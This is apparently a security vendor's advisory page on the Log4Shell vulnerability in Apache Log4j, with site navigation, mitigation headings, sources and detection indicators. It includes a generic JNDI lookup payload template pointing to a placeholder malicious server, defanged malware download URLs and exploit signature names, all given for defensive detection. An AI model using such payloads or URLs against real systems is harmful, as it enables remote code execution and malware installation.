WEBINAR | A Deep-Dive into 2023 Cyber Threats
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
April 18, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
Updated 12/29
A zero-day vulnerability involving the Log4j 2 utility was publicly disclosed on December 9, 2021, via the Apache GitHub. Log4j 2 is an open-source Java logging library integrated in many enterprise applications, as well as open-source software and other services. The widespread use and configuration variables make this is a high impact threat.
ReliaQuest has been tracking the vulnerability since it was first disclosed. This blog will provide ongoing status updates and recommendations for mitigating the impact of Log4j in customer environments. Additional details on the Log4Shell vulnerability and tools to respond are available in Log4Shell and ReliaQuest Solutions.
The information below is accurate as of Wednesday, December 29
Latest Updates
Affected Versions
Patched Versions
Standing Customer Recommendations
ReliaQuest Detections
ReliaQuest is deploying the following detection capabilities:
ReliaQuest GreyMatter Hunt
ReliaQuest is actively hunting in both SIEM and EDR customer environments for activity related to this campaign, with a focus on successful exploitation using host-based telemetry.
ReliaQuest SIEM and EDR Patching
———————————————————————————————
Description
A remote code execution vulnerability was discovered in Apache Log4j and is being actively exploited. When passing crafted parameters to a system running the vulnerable version of this code, the string will execute. Current exploitation of this vulnerability is leveraging LDAP calls to malicious servers that redirects to malicious Java class files for execution. Other methods of exploitation exist as well that are still being discovered. As of this writing, a typical observance of this attack contains the following in a web request log: “${jndi:[PROTOCOL]://[MALICIOUS SERVER]/}”. Indicators of Compromise (IOCs) are added to the ReliaQuest Emergency Feed as they are identified. ReliaQuest has already identified IP addresses conducting scanning activities and have added these IP addresses to our detection feeds.
Vulnerability Discovery
NOTE: Some tools can leak information about your environment. ReliaQuest recommends evaluating the impact to your organization before using them.
Helpful Resources
Sources
[1] https://www.lunasec.io/docs/blog/log4j-zero-day/
[2] https://github.com/tangxiaofeng7/apache-log4j-poc
[3] https://logging.apache.org/log4j/2.x/security.html
[4] https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
[6] https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
[7] https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
[8] https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
[9] https://github.com/cisagov/log4j-affected-db
[10] https://github.com/fullhunt/log4j-scan
[11] https://github.com/huntresslabs/log4shell-tester
[12] https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/
[13] https://www.blumira.com/analysis-log4shell-local-trigger/
[14] https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi
[15] https://github.com/curated-intel/Log4Shell-IOCs
[16] https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
[17] https://www.ibm.com/support/pages/node/6528440?myns=swgother&mynp=OCSSBQAC&mync=E&cm_sp=swgother-_-OCSSBQAC-_-E
[18] https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
[19] https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
[20] https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
Severity Criteria ✓ This technique can propagate without user interaction ✓ This technique can cause serious impacts ✓ This technique affects nearly all Java platforms ✓ This technique is a major security event Advisory History
ReliaQuest has the following detection capabilities available: Building Block: 002650 – Log4j User Agent RCE Hunt: 002651 – log4j RCE (CVE-2021-44228) Rule: 002652 – Log4j Scanning and Response Traffic
ReliaQuest has the following IOCs available within GreyMatter Intel: Signature: 2034647 Signature: 2034648 Signature: 2034649 Domain: bingsearchlib[.]com Signature: 91991 Signature: 2034650 Signature: 2034652 Signature: 2034651 Hash: e3eb1e98ca477918154b9ed7bcc2b7fe757c1020 Hash: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c Hash: f6e51ea341570c6e9e4c97aee082822b Hash: 9147d834f4cb7047a6e6ab96565868c6fede373e Hash: eb76b7fb22dd442ba7d5064dce4cec79e6db745ace7019b6dfe5642782bf8660 Hash: c717c47941c150f867ce6a62ed0d2d35 Hash: f568eb59fd37b2fe37db730292594d875d3a11e8 Hash: e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1 Hash: 1718956642fbd382e9cde0c6034f0e21 Hash: 799dd1a2181eb252499b775119b6b5bef4760b89 Hash: c70e6f8edfca4be3ca0dc2cfac8fddd14804b7e1e3c496214d09c6798b4620c5 Hash: cf2ce888781958e929be430de173a0f8 Hash: e851126ef41e3dc474238d3160f4b0e7e3bbb7ec Hash: 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 Hash: 40e3b969906c1a3315e821a8461216bb Hash: 0fb3020e3c38de5beae21622a910754241859d42 Hash: 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 Hash: 6d275af23910c5a31b2d9684bbb9c6f3 Hash: 777c54e96d29a0ed6ddf9698c86afb74322c130f Hash: 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 Hash: 1348a00488a5b3097681b6463321d84c Hash: 1d1866b00f948c103a9076b39061bde5c1f68350 Hash: 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 Hash: 648effa354b3cbaad87b45f48d59c616 Hash: 0194637f1e83c2efc8bcda8d20c446805698c7bc Hash: 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b Hash: 2fbc3b9421bc770831a724d9e467c7dbc220dc41c0ca21d33a45893be4ff82d4 Hash: 95d9a068529dd2ea4bb4bef644f5c4f5 Hash: 17542b2d0614bb363614e734ea1dde508cb7496b Hash: 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b URL: https://62[.]210[.]130[.]250/lh[.]sh URL: https://93[.]189[.]42[.]8/kinsing Signature: 58722 Signature: 58723 Signature: 58724 Signature: 58725 Signature: 58726 Signature: 58727 Signature: 58728 Signature: 58729 Signature: 58730 Signature: 58731 Signature: 58732 Signature: 58733 Signature: 58734 Signature: 58735 Signature: 58736 Signature: 58737 Signature: 58738 Signature: 58739 Signature: 58740 Signature: 58741 Signature: 58742 Signature: 58743 Signature: 58744 Signature: 300055 Signature: 300056 Signature: 300057 Signature: 300058 Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-1 Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-1 Signature: Unix[.]Malware[.]Mirai-9914842-0 Signature: Unix[.]Malware[.]Mirai-9914843-0 Signature: Linux[.]PossibleKinsingMalware[.]ioc Signature: 58751 Signature: W32[.]PossibleTomcatLog4ShellExploit[.]ioc Signature: Java[.]Exploit[.]CVE_2021_44228-9914600-2 Signature: Java[.]Exploit[.]CVE_2021_44228-9914601-4 Signature: Java[.]Exploit[.]CVE_2021_44228-9915330-0 Signature: apache: Apache[.]Log4j[.]Error[.]Log[.]Remote[.]Code[.]Execution Signature: ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) Signature: ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) Signature: ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) Signature: ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) Signature: ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)